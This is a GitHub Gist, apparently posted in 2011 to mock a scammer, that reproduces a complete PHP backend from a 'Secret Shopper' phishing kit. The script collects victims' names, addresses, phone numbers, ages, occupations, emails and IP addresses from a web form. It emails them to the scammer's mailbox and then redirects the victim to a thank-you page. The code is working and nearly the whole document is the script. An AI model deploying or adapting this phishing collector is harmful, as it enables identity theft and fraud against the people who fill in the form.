Created
August 25, 2011 18:04
-
-
Save mitio/1171313 to your computer and use it in GitHub Desktop.
Some stupid hacker-kid's script.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<? | |
$ip = getenv("REMOTE_ADDR"); | |
$message .= "Secret Shopper Creat3d By Bl0W\n"; | |
$message .= ".:: PERSONAL INFORMATION ::.\n"; | |
$message .= "First name : ".$_POST['strFirstname']."\n"; | |
$message .= "Last name : ".$_POST['strLastname']."\n"; | |
$message .= "Street Address : ".$_POST['strAddy']."\n"; | |
$message .= "City : ".$_POST['strCity']."\n"; | |
$message .= "State : ".$_POST['strState']."\n"; | |
$message .= "Zip Code : ".$_POST['strZipCode']."\n"; | |
$message .= "Cell Number : ".$_POST['strCellno']."\n"; | |
$message .= "Age : ".$_POST['strAge']."\n"; | |
$message .= "Current Occupation : ".$_POST['strOccu']."\n"; | |
$message .= "Email Address : ".$_POST['strAemail']."\n"; | |
$message .= "AVAILABILITY : ".$_POST['strava']."\n"; | |
$message .= "Country : ".$_POST['strCountry']."\n"; | |
$message .= "IP : ".$ip."\n"; | |
$message .= "-----------------------------\n"; | |
$recipient = "[email protected]"; | |
$subject = "Secret Shopper"; | |
$headers = "From: Secret Shopper<[email protected]>"; | |
$headers .= $_POST['eMailAdd']."\n"; | |
$headers .= "MIME-Version: 1.0\n"; | |
$send = ""; | |
$arr=array($send, $IP); | |
foreach ($arr as $send) | |
mail($send,$subject,$message,$headers); | |
mail("[email protected]",$subject,$message,$headers); | |
?> | |
<meta http-equiv="REFRESH" content="0;url=thankyou.html"> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
among us